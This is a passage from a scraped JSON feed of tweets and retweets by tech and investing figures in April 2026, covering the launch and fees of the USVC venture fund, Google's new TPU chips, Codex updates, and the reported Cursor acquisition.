want to IPO and then deal with the hassle of lawfare. Look at what happened to Elon in Delaware. \n\nFor us, as an ordinary person, this means that by the time a company goes public, we are \"last money in.\" This is why I always tell friends and family to buy SPY (or FXAIX) and QQQM. Don't day trade. You won't beat the market. (Everyone who claims they do are lying, they use a short timeline and never mention all of the losing trades. Or they are insider trading or beating the market by a relatively small amount. For most of us, day trading is the way of death.) \n\nWith USVC, regular people can get into some of the companies that will IPO, eventually, at high valuations still, but pre-IPO.\n\nI've read all of the negative commentary about the fund. I don't understand the \"illiquid\" complaint. If you started your own business and bought equipment, you wouldn't be paying yourself. If you really had to expand, you might not pay yourself for years. When you put your money in, it's locked up, you grow out the company for several years. Hopefully you can afford to pay yourself after a couple of years. If you QSBS'ed it, maybe you sell in 5-10. Who knows. In the meantime, yes, your money is gone. Every business owner knows this feeling. Your company is \"worth\" some amounts on paper, and you pay yourself a salary to live on. That's if things are going well.\n\nThere's also a lot of discussion around carry and fees. The question is will those fees be less than what the post-IPO price of the companies will be is. That's up to everyone to decide for themselves.\n\nIn any case, I have no financial interest into this fund. I am not telling you to buy into or not. \n\nI do like to flag stuff like this for people who read me, operating under the rule that, \"Cerno writes for the version of Cerno who did not understand any of this stuff, but sure would have liked to have.\" As an example, I didn't know what QSBS was until it was too late. [Frown face.] \n\nAnd I didn't buy Tesla at $2 [panic attack], despite wanting to, because a financial adviser friend told me, \"You shouldn't invest on a feeling, you don't have any edge here.\" \n\nI would tell my prior self: You can't invest EVERYTHING based on vibes, but you can and should absolutely do so now and then. (Note: If you have an addictive personality, this is bad advice. But I am only addicted to X and See's Candies.)\n\nBut I will post the negative comments about the fund. I don't want anyone to ever read me and obtain bad information.\n\nEveryone has to decide for themselves what to do.\n\nI've also learned from experience that if something goes well, nobody sends me money or a box of cigars as a thank you. It was their brilliance that led them to the big gains. If it goes wrong, then the fault is all mine and people hate me for it.\n\nThat's also why I don't even want to post about the fund at all, but here goes.", + "url": "https://nitter.net/Cernovich/status/2047481012826124516#m", + "published_at": "2026-04-24T01:01:28+00:00" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "RT by @sama: Today we open sourced many of OpenAI's monitorability evaluations. We hope that the research community and other model developers can build upon them and use them to evaluate the monitorability of their own models.\n\nhttps://alignment.openai.com/monitorability-evals/", + "url": "https://nitter.net/bobabowen/status/2047473914528563592#m", + "published_at": "2026-04-24T00:33:16+00:00" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: I spent the morning digging into USVC fees.\n\nTLDR: In my opinion, there is no lower-cost way to invest in VC other than becoming one. I’m expecting to pay the same or less than it costs to invest in a good VC fund. And a lot less than investing in a fund-of-funds. All while getting the benefits of a fund-of-funds that can do direct, secondary, and fund investments.\n\nCarry. If USVC invests in a fund or SPV, I will pay that manager’s ~20% carry. That’s what I expected. All fund-of-funds do it this way. I’m glad to pay carry to invest with good managers. USVC doesn’t charge additional carry.\n\nDirect investments. There is no underlying carry on USVC’s direct investments and they aim to make this a major portion of the portfolio. This would bring down the blended cost of USVC substantially, compared to a VC fund.\n\nFees. The annual fee in the first year is capped at 2.5%. This includes the fees of the underlying funds that USVC invests in, which is a huge deal. Just investing in a VC fund costs 2-2.5% a year. Also, the fee would be 3.6% but AngelList is subsidizing it in the first year.\n\nThere’s a possibility the annual fee could go up in the future and I’ve told the team that this is extremely confusing and weird, and they are working on it with haste.\n\nOverall, I’m expecting to pay the same or less than it costs to invest in a good VC fund, but I’m actually getting access to a fund-of-funds that can do direct, secondary, and fund investments. A typical fund-of-funds charges another 1/10 (fees/carry) on top of the VC’s 2/20, for a total of 3/30.\n\nSome other things I learned:\n\nEarly-stage. Early-stage deals are planned. I would rather invest now in case those early-stage investments get marked up quickly. These deals will be riskier and more illiquid, so there’s no free lunch here. The current portfolio includes late-stage (OpenAI, Anthropic, xAI) and mid-stage (Sierra, Vercel, Crusoe, Legora).\n\nIlliquidity. This is venture capital. The underlying investments are illiquid. Don’t invest if you’re uncomfortable with illiquidity. That said, USVC is working on redemptions of up to 5% of the fund every quarter. It’s not guaranteed, but if it’s offered, you can choose to get partial liquidity along the way.\n\nInternational. There is a lot of demand from international investors. USVC is not yet set up to accept international investors at scale, but they’re working on it.\n\nSales load. There is no sales load. USVC is only available on usvc dot com and the sales load is waived if you buy through the site. In the future, brokers that list USVC may charge up to a ~3% sales load; that’s how they make their money.\n\nDisclosure: I’m a co-founder of AngelList and have shares in the business.", + "url": "https://nitter.net/nivi/status/2047471220451578132#m", + "published_at": "2026-04-24T00:22:33+00:00" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Why the biggest fintech players are in for a shock.\n\n\"The shift is from human UX to agent UX.\n\nIn the past, you won with dashboards, design and user experience.\n\nNow, the buyer is an AI agent, and it only cares about APIs, performance and integration.\n\nThat breaks traditional moats and puts even the biggest fintech players at risk.\" @jasonlk\n\nLove to hear your thoughts @pedroh96 @awxjack @sebatklarna @fintechjunkie", + "url": "https://nitter.net/HarryStebbings/status/2047461264998478113#m", + "published_at": "2026-04-23T23:43:00+00:00" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Trump completely passed out, reawakened, then passed out again during today's pressor in the Oval Office. 😂🤣👇", + "url": "https://nitter.net/maddenifico/status/2047454244781818205#m", + "published_at": "2026-04-23T23:15:06+00:00" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "I used to think MAUs and WAUs were the dumbest metric. Now I think it's the most important.\n\n\"I used to think MAUs and WAUs did not matter, now I think they are critical.\n\nIn the AI era, usage is the leading indicator of value.\n\nIf your usage is growing faster than revenue, you are building something people truly want.\" @jasonlk\n\nLove to hear your thoughts on this @joshelman @kirbyman01 @Joshuabrowder @an21m @mignano and how your thoughts on what matters changed?", + "url": "https://nitter.net/HarryStebbings/status/2047426032840634830#m", + "published_at": "2026-04-23T21:23:00+00:00" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "RT by @eladgil: How does one make sense of SF?\n\nWe are living through the craziest computing revolution of the last 2 decades....and 95% of the value being created is within a 4-mile radius in SF (h/t @eladgil )\n\nIt's just hard to understand....why is the concentration so high?\n\nWhat is it about this place? There are good reasons that people will offer...good universities, great companies, talent networks, venture capital yada yada yada\n\nBut all of that is hard to emotionally understand.\n\nI tend to try to answer these questions through my own lived experience.\n\nTwo things happened this week that brought it home for me.\n\nOn Wed evening, two GOATS of the design world (@soleio and @rsms ) did a design talk at SPC.\n\nI saw some other GOATS at the talk (@aaron_ , @benbarry )\n\nAnd you realize that these GOATS are just so curious about the world. They just want to build and learn. And give back. And with an air of humility and passion. It's so so cool and inspiring.\n\nAnd then this week we had someone release a mind-bendingly amazing demo of every pixel being generated.\n\nhttps://x.com/zan2434/status/2046982383430496444\n\nPeople were blown away but @eddiejiao_obj and @zan2434 had been jamming creatively for a bunch of time @southpkcommons . \n\nAnd in that entire time, they were surrounded by a culture and environment and ecosystem that says \"that is crazy but my god, if it works, then what could happen\"\n\nThere is wonder, amazement and curiosity.\n\nAnd passion.\n\nI wish this city were cleaner and better governed (but Dan Lurie is crushing).\n\nWe are so lucky to be surrounded by weirdos who love to build.\n\nThis is why we are who we are.", + "url": "https://nitter.net/adityaag/status/2047421448449630379#m", + "published_at": "2026-04-23T21:04:47+00:00" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Slightly soppy bromance post but Jason believed in me when I was 18 and at law school still. \n\nThere were next to no signs 20VC was or would be a success. \n\nHe has been a dear friend ever since!", + "url": "https://nitter.net/HarryStebbings/status/2047413285675290984#m", + "published_at": "2026-04-23T20:32:21+00:00" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "R to @JeffDean: It's worth pointing out that we have been pushing on large-scale training and asynchronous techniques for the last ~14 years. Here's our NeurIPS 2012 paper where we demonstrated that this approach could be used to train very large neural networks (for the time: 30X larger than any previous neural network), and to spread the training out across thousands of machines in a fault-tolerant manner.\n\nPDF: https://static.googleusercontent.com/media/research.google.com/en//archive/large_deep_networks_nips2012.pdf\n\nhttps://static.googleusercontent.com/media/research.google.com/en//archive/large_deep_networks_nips2012.pdf\n\n(This paper doesn't get as much attention because we neglected to put it on Arxiv at the time: oops!)", + "url": "https://nitter.net/JeffDean/status/2047408945950802186#m", + "published_at": "2026-04-23T20:15:06+00:00" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "R to @JeffDean: TPU 8i is co-designed with our Gemini research team to support low latency inference. Among the attributes that support this are large amounts of on-chip SRAM, enabling more computations to be done on chip without having to go to HBM for weights or KVCache state as often.\n\nThe boardfly network topology (see image below) offers a much lower diameter network to connect all 1152 chips in an 8i pod, by fully connecting all 4 chips on the board together, fully connecting groups of 8 boards together, and then fully connecting 36 groups of 8 boards together. In addition, there is specialized Collectives Acceleration Engine (CAE) circuitry on each chip to offload various kinds of reductions and other global operations from the main computational portion of each chip, reducing on-chip latency by up to 5x.\n\nTogether, these features will offer very high throughput for large-scale models (including MoEs, which often require mapping onto many chips for inference), and will do so at very low latency. This will make agentic workloads and interactive usage really shine on the TPU 8i.", + "url": "https://nitter.net/JeffDean/status/2047407537566495033#m", + "published_at": "2026-04-23T20:09:30+00:00" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "R to @JeffDean: First, let's talk about TPU 8t, which is designed for large-scale training and inference throughput.\n\nThe pod size is increased slightly to 9600 chips, and provides ~3X the FP4 performance per pod vs. Ironwood (8t has 121 exaflops/pod vs. 42.5 exaflops/pod for Ironwood). In addition, the ICI network bandwidth is 2X higher per chip and the scale out datacenter networking is 4X higher per chip.\n\nImportantly, this system also offers 2X the performance / watt, continuing the trend of significant energy effiency improvements that we've had for many generations of TPUs (8t offers ~60X the performance/watt as TPU v2).", + "url": "https://nitter.net/JeffDean/status/2047405389856297387#m", + "published_at": "2026-04-23T20:00:58+00:00" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "I had a good time discussing yesterday's Google TPU v8t and v8i announcement at Cloud Next with Amin Vahdat along with @AcquiredFM hosts @gilbert\nand @djrosent.\n\nThe blog post announcement has lots of details about these new chips:\n\nhttps://blog.google/innovation-and-ai/infrastructure-and-cloud/google-cloud/eighth-generation-tpu-agentic-era/\n\nHere's a thread of some particular things I'm excited about:", + "url": "https://nitter.net/JeffDean/status/2047403921912873257#m", + "published_at": "2026-04-23T19:55:08+00:00" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "\"don't retweet this, don't retweet this, don't retweet this...\"\n\nah fuck it, life imitates art.", + "url": "https://nitter.net/sama/status/2047403771416940715#m", + "published_at": "2026-04-23T19:54:32+00:00" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "We tried a new thing with NVIDIA to roll out Codex across a whole company and it was awesome to see it work.\n\nLet us know if you'd like to do it at your company!", + "url": "https://nitter.net/sama/status/2047395562501411058#m", + "published_at": "2026-04-23T19:21:55+00:00" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "embers", + "url": "https://nitter.net/sama/status/2047392357482639749#m", + "published_at": "2026-04-23T19:09:11+00:00" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: Shadow Milk Cookie’s Mind Blown Jester", + "url": "https://nitter.net/breadstickz1/status/2047389262253855041#m", + "published_at": "2026-04-23T18:56:53+00:00" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "RT by @sama: there are early signs of 5.5 being a competent ai research partner. several researchers let 5.5 run variations of experiments overnight given only a high level algorithmic idea, wake up to find completed sweep dashboards and samples, never having touched code or a terminal at all", + "url": "https://nitter.net/tszzl/status/2047386955550470245#m", + "published_at": "2026-04-23T18:47:43+00:00" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "RT by @sama: New in the Codex app:\n\n- GPT-5.5\n- Browser control\n- Sheets & Slides\n- Docs & PDFs\n- OS-wide dictation\n- Auto-review mode\n\nEnjoy!", + "url": "https://nitter.net/ajambrosino/status/2047381565534322694#m", + "published_at": "2026-04-23T18:26:18+00:00" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "RT by @erikbryn: Congratulations to Lab Digital Fellow Angela Aristidou, Digital Fellow @avi_collis, and Research Scientist @d_vidnguyen for being a part of @GoogleAI's inaugural group of global economic scholars!\n\nhttps://ai.google/economy/ai-economy-researchers/", + "url": "https://nitter.net/DigEconLab/status/2047378514240999569#m", + "published_at": "2026-04-23T18:14:10+00:00" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: This study is an important part of Vanishing Culture, the new book OUT TODAY from @internetarchive. 🕳️\n\nRead for free or purchase in print ➡️ https://archive.org/details/vanishing-culture-2026", + "url": "https://nitter.net/internetarchive/status/2047378161860776085#m", + "published_at": "2026-04-23T18:12:46+00:00" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "I still think on usability-wise, there is a big gap between \"your thing in the training data\" v.s. \"your thing in the SKILL.md\". Prove me wrong otherwise.", + "url": "https://nitter.net/liuliu/status/2047374234004115719#m", + "published_at": "2026-04-23T17:57:10+00:00" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "Entrepreneurship is a distributed search job across the surface of commercial opportunities", + "url": "https://nitter.net/eladgil/status/2047373700643844303#m", + "published_at": "2026-04-23T17:55:03+00:00" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Does the $60BN Cursor Deal Make Sense:\n\n\"It actually makes sense when you look at what each side lacks.\n\nOne has explosive revenue but weak margins due to compute and model costs.\n\nThe other has massive compute and models but no real revenue.\n\nPut them together and it solves both problems.\" @rodriscoll\n\nLove to hear your thoughts on this @levie @ttunguz @matanSF @shaunmmaguire @beffjezos @martin_casado", + "url": "https://nitter.net/HarryStebbings/status/2047371926335857036#m", + "published_at": "2026-04-23T17:48:00+00:00" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "Big congrats", + "url": "https://nitter.net/eladgil/status/2047365014500389353#m", + "published_at": "2026-04-23T17:20:32+00:00" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "My view is the AI boom will only accelerate and is a once in a lifetime transformation\n\nThis is orthogonal to whether many AI companies should exit in next 12-18 months, as some may lack durability vs labs, new entrants, or weird market shifts\n\nhttps://www.businessinsider.com/ai-startup-founders-warning-elad-gilsell-while-boom-lasts-2026-4", + "url": "https://nitter.net/eladgil/status/2047364865527075139#m", + "published_at": "2026-04-23T17:19:56+00:00" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "It is a very expensive desire to be a value investor today. \nIt is much easier to be a momentum investor, that is for sure.", + "url": "https://nitter.net/HarryStebbings/status/2047358263868436791#m", + "published_at": "2026-04-23T16:53:42+00:00" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "It's been a delight to provide small amounts of advice and suggestions to people working on the Decoupled DiLoCo training system. This approach enables graceful handling of failures in large scale training jobs, by allowing (N-1) / N units to proceed when one fails.\n\nThread ⬇️", + "url": "https://nitter.net/JeffDean/status/2047339995682529313#m", + "published_at": "2026-04-23T15:41:07+00:00" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: We launched USVC yesterday and it was one of the most fun days of my career\n\nThousands of people ended up subscribing for literally tens of millions of dollars\n\nWhile most of the reception was positive, there was some interrogation on a few important topics:\n\n1 - The USVC fee structure\n2 - The Investment Strategy\n3 - Support for International Investors\n\nLet's talk about them\n\nThe USVC Fee Structure\n\nIf you have followed me for any amount of time, you'll know this is a personal topic for me.\n\nI've frequently complained about fees in financial services. From VC funds to wealth advisors, I've taken no prisoners in calling these out.\n\nThe last venture capital fund I ran was the only VC fund I know of that raised more than 50M and didn't charge a penny of management fees.\n\nSo how much does USVC actually charge and why it is so much?\n\nUSVC costs 2.5% all-in to investors today\n\nThere are some misconceptions based on reading our prospectus, including:\n\n- A 3% sales load\nPlatforms that offer USVC could charge this if they wanted, but we don't. If you buy on http://USVC.com as everyone yesterday did, you pay no sales load.\n\n- Underlying fund fees\nEarly investments from USVC have been in funds that have their own fees, and these fees are paid by USVC. However, these management fees are already included in the net expense ratio of 2.5%.\n\nIn time, I'm planning to move a meaningful chunk of the portfolio to be direct investments in startups on the cap table which will have 0 underlying fees or carry.\n\nThe 2.5% fee is inclusive of everything, including our management fee.\n\n- The advertised 3.61% today\nRight now, even though you pay 2.5%, it costs us 3.61% to service this product.\n\nThere are two big reasons for this - the underlying fund fees (which we're working to improve with direct investments) and the fact that operationally running these types of funds is very expensive.\n\nWe've decided to absorb the fees excess of 2.5% for at least the first year.\n\nDuring the time, we're going to make more efficient investments and wait for economies of scale to kick in on operational costs.\n\nNow... you may ask: isn't 2.5% still very expensive?\n\nThe answer is... it depends.\n\nTop venture capital firms charge that just on their management fees, and force you to pay that for 10 years.\n\nAnd then they charge 20% of profits on top of that!\n\nWe charge no carry on our direct investments at all, which makes this 2.5% fee attractive for the asset class.\n\nIt's ironic to call this a cash grab when we are subsidizing this product out of our pocket to keep the fees in line\n\nI encourage everyone to go read the full disclosures and prospectus at http://usvc.com.\n\nStay tuned for Part 2 later today on Investment Strategy", + "url": "https://nitter.net/ankurnagpal/status/2047334901033123913#m", + "published_at": "2026-04-23T15:20:52+00:00" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: OH MYG GDOODOISU #moeoverload 🥹", + "url": "https://nitter.net/cuckuke/status/2047325302771061148#m", + "published_at": "2026-04-23T14:42:44+00:00" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: The most dangerous thing in Washington right now isn't just the corruption—it's the retaliation against the people who expose it. When government power is used in ways that appear designed to intimidate a journalist for revealing potential abuses, the message is unmistakable: be quiet or be targeted. That’s how fear replaces truth. That’s how a free press is pushed toward silence. And that’s how democracies start to collapse.", + "url": "https://nitter.net/Weinsteinlaw/status/2047321581966291154#m", + "published_at": "2026-04-23T14:27:57+00:00" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "R to @HarryStebbings: Spotify 👉 https://open.spotify.com/episode/6EjWkbt83H2WXhDMjjS7PF\nYoutube 👉 https://youtu.be/s61XVZAt5ns\nApple Podcasts 👉 https://podcasts.apple.com/us/podcast/20vc-cursor-acquired-for-%2460bn-by-xai-anthropic-hits/id958230465?i=1000763211245", + "url": "https://nitter.net/HarryStebbings/status/2047316269465006363#m", + "published_at": "2026-04-23T14:06:50+00:00" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "This is the big f**king deal.\n\nCursor acquired for $60BN by xAI\n\nI sat down with @jasonlk and @rodriscoll to discuss the deal, along with the biggest news in tech this week:\n\n- Anthropic Hits $1TRN in Secondary Markets\n- Anthropic Launches Claude Code\n- Rippling Hits $1BN in ARR\n- Cerebras Files for IPO\n\nMy notes below:\n\n1. This $60B deal actually makes sense\n\nThe potential $60 billion acquisition of Cursor by xAI/SpaceX is an industrial \"marriage made in heaven\". Cursor has an exploding business with billions in ARR but \"shitty\" gross margins because they lack their own compute and models. Elon Musk has the massive Colossus GPU data center and a model (Grok) but effectively no revenue, making the vertical integration of these two companies a strategic fix for both.\n\n2. How Claude Design Will Hurt Figma\n\nAnthropic’s Claude Design is a full design application, not just a set of prompts or skills. It poses an existential threat because it allows product and engineering teams to bypass the traditional 30-day designer turnaround. By enabling \"normal people\" to design and move into production immediately, it will \"maim and nibble\" at Figma’s growth over the coming quarters.\n\n3. I used to think MAUs and WAUs were the dumbest metric. Now I think it's the most important.\n\nIn the B2B world, usage metrics like MAUs, WAUs, and DAUs are now more critical than revenue. If usage isn't growing faster than revenue, it's a sign of a struggling startup or \"stealth churn,\" where users have stopped active engagement despite the company still collecting fees. In the AI age, the ultimate test of a product's value is whether people are actually using its AI features daily.\n\n4. Why the biggest fintech players are in for a shock.\n\nExisting moats for fintech giants like Brex and Ramp are weakening as the selection criteria for vendors shifts. Customers are no longer prioritizing a dashboard's UI; they care which API works best with their autonomous AI agents. If a new vendor offers a superior API that allows an \"AI VP of Finance\" to automate tasks like collections, companies will switch vendors in a single week.\n\n5. Agent fabric is the layer that manages all your agents\n\nThe defining 2027 challenge is the \"agent fabric\". The infrastructure needed to manage and secure hundreds of autonomous agents. This gives a massive advantage to incumbents like Salesforce. They are positioning themselves as the trusted governance layer to guardrail agents and prevent them from going rogue", + "url": "https://nitter.net/HarryStebbings/status/2047316267858645088#m", + "published_at": "2026-04-23T14:06:50+00:00" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "RT by @Ronald_vanLoon: Rapid-Deploy Foldable Solar Panels Deliver Instant Off-Grid Power\nby @amazingthings_\n \n#Sustainability #RenewableEnergy #CleanEnergy", + "url": "https://nitter.net/Ronald_vanLoon/status/2047230765193207816#m", + "published_at": "2026-04-23T08:27:04+00:00" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "RT by @Ronald_vanLoon: #AI-generated #Sensors open new paths for early cancer detection\nby Anne Trafton @MIT\n\nLearn more: https://bit.ly/4pvlBPL\n\n#MedTech #Healthcare #HealthTech #Tech #TechForGood", + "url": "https://nitter.net/Ronald_vanLoon/status/2047220936902861168#m", + "published_at": "2026-04-23T07:48:01+00:00" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "RT by @Ronald_vanLoon: RIVR Delivery #Robot Sits Down to Drop Packages from the Bottom\nby @rivr_tech\n\n#Robotics #Engineering #ArtificialIntelligence #Innovation #Technology", + "url": "https://nitter.net/Ronald_vanLoon/status/2047215673680490894#m", + "published_at": "2026-04-23T07:27:06+00:00" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "RT by @Ronald_vanLoon: China Deploys Solar #Robot to De-Ice Power Lines in Extreme Mountain Conditions\nby @IntEngineering\n\n#Robotics #Engineering #Innovation #Technology", + "url": "https://nitter.net/Ronald_vanLoon/status/2047208118723936306#m", + "published_at": "2026-04-23T06:57:05+00:00" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "RT by @Ronald_vanLoon: Treventus Scan #Robot Digitizes Up to 2,500 Pages Per Hour\nby @AadityaAnand_11\n\n#Robotics #Innovation #EmergingTech #Technology", + "url": "https://nitter.net/Ronald_vanLoon/status/2047199600872665579#m", + "published_at": "2026-04-23T06:23:14+00:00" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "RT by @soumithchintala: Incredible work by Sony published in @Nature today! 🏓\n\nThey’ve built “Ace”, an autonomous ping-pong robot that uses RL and Sony’s vision sensors to achieve expert-level play in ping pong. A huge leap forward for adaptive robotics.\n\nhttps://www.nature.com/articles/s41586-026-10338-5", + "url": "https://nitter.net/hardmaru/status/2047191747793649805#m", + "published_at": "2026-04-23T05:52:02+00:00" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "R to @DavidSacks: Full article:\n\nhttps://www.foxnews.com/politics/anthropics-moral-compass-architect-suggested-ai-overcorrection-could-address-historical-injustices", + "url": "https://nitter.net/DavidSacks/status/2047104229773279572#m", + "published_at": "2026-04-23T00:04:16+00:00" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "Reverse discrimination does not undo historical injustices but rather perpetrates new ones against a different set of individuals. This foments social strife and undermines the ideal of America as a meritocracy. AI models should not be taught that this practice is justified.", + "url": "https://nitter.net/DavidSacks/status/2047103978979119580#m", + "published_at": "2026-04-23T00:03:16+00:00" + }, + { + "handle": "CryptoCred", + "account": "@CryptoCred", + "name": "Credible Crypto", + "title": "Dev is posting about price", + "url": "https://nitter.net/CryptoCred/status/2047079463750377958#m", + "published_at": "2026-04-22T22:25:51+00:00" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "<3 @infisical", + "url": "https://nitter.net/eladgil/status/2047052737762980083#m", + "published_at": "2026-04-22T20:39:39+00:00" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "Introducing USVC - a single basket of high-growth venture capital, for everyone. \n\nNo accreditation required, SEC-registered, and a very low $500 minimum. \n\nIncludes OpenAI, Anthropic, xAI, Sierra, Crusoe, Legora, and Vercel. As USVC adds more companies, investors will own a piece of that too. \n\nLiquidity typically comes when companies exit, but we’re aiming to let investors redeem up to 5% of the fund every quarter. This isn’t guaranteed, but if we can make it work, you won’t be locked up like in a traditional venture fund.\n\nIt runs on AngelList, which already supports $125 billion of investor capital. \n\nAnd I’ve joined USVC as the Chairman of its Investment Committee.\n—\n\nGo back to the 1500s, you set sail for the new world to find tons of gold - that was adventure capital. \n\nEarly-stage technology is the modern version. It says we are going to create something new, and it’s risky. It’s daring.\n\nBut ordinary people can’t invest until it’s old, until it’s no longer interesting, until everybody has access to it. By the time a stock IPOs, most of the alpha is gone. The adventure is gone. Public market investors are literally last in line.\n\nThis problem has become farcical in the last decade. Startups are reaching trillion dollar valuations in the private markets while ordinary investors have their noses up to the glass, wondering when they’ll be let in.\n\nInvesting in private markets isn’t easy. You need feet on the ground. You need judgment built over years. Most people don’t have the patience to wait ten or twenty years for an investment to come to fruition.\n\nBut there is no more productive, harder-working way to deploy a dollar than in true venture capital.\n\nUSVC enables you to invest in venture capital in a broad, accessible, professionally-managed way, through a single basket of innovation, focused on high-growth startups, at all stages. \n\nIt is how you bet on the future of tech: the smartest young people in the world, working insane hours, leveraged to the max, with code, hardware, capital, media, and community. Your dollar doesn’t work harder anywhere.\n\nThere is an old line - in the future, either you are telling a computer what to do, or a computer is telling you what to do. You don’t want to be on the wrong side of that transaction.\n\nUSVC lets you buy the future, but you buy it now. Then you wait, and if you are right, you get paid.\n\nGet access here:\n\nhttp://usvc.com", + "url": "https://nitter.net/naval/status/2046991137022648800#m", + "published_at": "2026-04-22T16:34:52+00:00" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "Ask Codex about Ulysses attention: wow, you know so much and can help me get this communication+spda thing work!\nAsk Codex to implement a segmented file downloader: didn’t even get the completion block hooked up right.", + "url": "https://nitter.net/liuliu/status/2046986486629986435#m", + "published_at": "2026-04-22T16:16:24+00:00" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: Announcing my new thing:\n\nI'm launching a new public venture fund\n\nUSVC is built by AngelList with @naval shaping our investment strategy in the technology companies building our future\n\nAnd unlike traditional venture funds, everyone can invest along with just $500:", + "url": "https://nitter.net/ankurnagpal/status/2046961436593713241#m", + "published_at": "2026-04-22T14:36:51+00:00" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "I have interviewed 1,000 founders over 10 years. If I could only invest in five, this would be them: \n\n1. Nik Storonsky (Revolut) \n\n2. @alanchanguk (Fuse Energy) \n\n3. Adam Foroughi (AppLovin) \n\n4. @awxjack (Airwallex) \n\n5. @MaxJunestrand (Legora)\n\nOk one more… \n\n6. @vladtenev (Robinhood) \n\nPS. No order intended.", + "url": "https://nitter.net/HarryStebbings/status/2046938853445959738#m", + "published_at": "2026-04-22T13:07:07+00:00" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: they're about to start making out", + "url": "https://nitter.net/savanaclavv/status/2046771924064186549#m", + "published_at": "2026-04-22T02:03:48+00:00" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "RT by @erikbryn: Thanks for coming in today, and for sharing your feedback on my team’s idea!\n\nYour optimistic take on the value that humans will continue to deliver was so refreshing.", + "url": "https://nitter.net/TejuAdeyinka/status/2046761422148018260#m", + "published_at": "2026-04-22T01:22:04+00:00" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "What a time to be alive", + "url": "https://nitter.net/eladgil/status/2046722094348771758#m", + "published_at": "2026-04-21T22:45:48+00:00" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "RT by @erikbryn: How do AI agents influence knowledge work?\n\n@SuproteemSarkar's (@UChicago) talk at the DEL Seminar Series is now available on YouTube! Moderated by @erikbryn, Sarkar discusses three projects on the Economics of Applied AI.\n\nWatch here: https://youtu.be/4_T4aTLWtwY", + "url": "https://nitter.net/DigEconLab/status/2046698761221783753#m", + "published_at": "2026-04-21T21:13:05+00:00" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "👀", + "url": "https://nitter.net/eladgil/status/2046695194054320150#m", + "published_at": "2026-04-21T20:58:54+00:00" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "I have interviewed 1,000 CEOs of the largest companies over the last 10 years. 